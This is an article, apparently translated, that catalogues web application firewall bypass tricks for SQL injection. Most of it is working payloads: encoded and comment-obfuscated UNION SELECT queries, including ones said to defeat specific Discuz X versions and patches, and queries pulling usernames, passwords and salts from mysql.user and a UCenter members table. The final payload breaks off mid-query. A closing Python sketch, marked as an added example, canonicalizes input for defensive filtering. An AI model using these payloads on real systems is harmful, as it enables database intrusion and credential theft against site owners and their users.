The WAFs We Bypassed Over the Years
This article summarizes various WAF bypass methods. You can use the methods below to bypass a WAF during testing; I hope it helps.

I. Encoding-based bypasses

1. URL encoding

?id=1 union select pass from admin limit 1
?id=1%20%75%6e%69%6f%6e%20%73%65%6c%65%63%74%20%70%61%73%73%20%66%72%6f%6d%20%61%64%6d%69%6e%20%6c%69%6d%69%74%20%31

2. Unicode encoding

'e' => '%u0065', // this is its Unicode encoding

?id=1 union select pass from admin limit 1
?id=1 un%u0069on sel%u0065ct pass f%u0072om admin li%u006dit 1

3. Bypassing Discuz X's built-in _do_query_safe()

gid=1 and 1=2 union select 1,2,3,4,5,6,concat(user,0x23,password),8,9,10,11,12,13 from mysql.user
Blocked.

gid=1 and 1=2 union/*!50000select*/1,2,3,4,5,6,concat(user,0x23,password),8,9,10,11,12,13 from mysql.user
Bypasses Discuz X2.0.

gid=@`'` union select @`'`,2,3,4,5,6,7,concat(user,0x3a,password),9,10,11,12,13,14 from mysql.user
Bypasses Discuz X2.5.

gid=`'` or @`''` union select 1 from (select count(*),concat((select database()),floor(rand(0)*2))a from information_schema.tables group by a)b where @`'`
Bypasses the second patch for Discuz X2.5.

Here I introduced `'` to hide the first @ character, and replaced the first @`'` with @`''`, so that the second @ can be replaced.

4. Bypassing a certain WAF (by Havij)

/*!30000union all select (select distinct concat(0x7e,0x27,unhex(Hex(cast(schema_name as char))),0x27,0x7e) from `information_schema`.schemata limit 10,1),null,null,null,null*/--

list.php?yw=bj&id=3&id=1/*!30000union all select (select concat(0x27,uid,0x5e,username,0x5e,password,0x5e,email,0x5e,salt,0x27) from `gs_ucenter`.uc_members limit 0,1),null,null,null,null*/--

5. Notes from one test

newsid=60+a%nd%201=(se%lect%20@@VERSION)--
newsid=60+a%nd%201=(se%lect%20@@servername)--
newsid=60+a%nd 1=(se%lect name f%rom mas%ter.dbo.sysd%atabases wh%ere dbid=1)--
newsid=60+a%nd (se%lect t%o%p 1 name f%rom pedaohang.d%b%o.s%ys%obje%cts where xtype='U' a%nd name not in (se%lect top 1 name fr%om gpbctv.dbo.sysobjec
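
Every variant above works because the filter matches on the raw request text while the backend interprets a decoded form. The following Python sketch is an added example, not part of the original document: it canonicalizes a parameter before applying a signature. The `SIGNATURE` rule, the function names and the sample inputs are constructed for illustration, and the stray-`%` handling assumes a classic ASP/IIS backend that discards a `%` not followed by two hex digits.

```python
import re
from urllib.parse import unquote_plus

# Deliberately small signature (assumption); production rule sets are broader.
SIGNATURE = re.compile(r"\bunion\b.{0,40}?\bselect\b|\(\s*select\b", re.I | re.S)

def canonicalize(value: str, max_rounds: int = 5) -> str:
    """Reduce a parameter to roughly what the backend would interpret."""
    for _ in range(max_rounds):  # repeat to unwrap nested encodings
        before = value
        # IIS/ASP-style %uXXXX escapes
        value = re.sub(r"%u([0-9a-fA-F]{4})", lambda m: chr(int(m.group(1), 16)), value)
        # Standard percent-encoding, with '+' treated as a space
        value = unquote_plus(value)
        # A '%' not followed by two hex digits is discarded (assumed ASP behaviour)
        value = re.sub(r"%(?![0-9a-fA-F]{2})", "", value)
        if value == before:
            break
    # MySQL executes the body of /*!NNNNN ... */, so keep the body
    value = re.sub(r"/\*!\d*(.*?)\*/", r" \1 ", value, flags=re.S)
    # Plain comments behave as whitespace
    value = re.sub(r"/\*.*?\*/", " ", value, flags=re.S)
    return re.sub(r"\s+", " ", value).strip().lower()

def is_suspicious(value: str) -> bool:
    """Apply the signature to the canonical form, never to the raw text."""
    return bool(SIGNATURE.search(canonicalize(value)))

# Constructed inputs modelled on the encodings listed in the text above.
SAMPLES = {
    "url": "1%20%75%6e%69%6f%6e%20%73%65%6c%65%63%74%20%70%61%73%73%20%66%72%6f%6d%20%61%64%6d%69%6e%20%6c%69%6d%69%74%20%31",
    "unicode": "1 un%u0069on sel%u0065ct pass f%u0072om admin li%u006dit 1",
    "versioned_comment": "1 and 1=2 union/*!50000select*/1,2,3 from mysql.user",
    "stray_percent": "60+a%nd%201=(se%lect%20@@VERSION)--",
}

if __name__ == "__main__":
    for name, raw in SAMPLES.items():
        print(f"{name:18} raw={bool(SIGNATURE.search(raw))} canonical={is_suspicious(raw)}")
```

Normalization narrows the gap but does not replace parameterized queries in the application, since the filter can only approximate how a given backend parses its input.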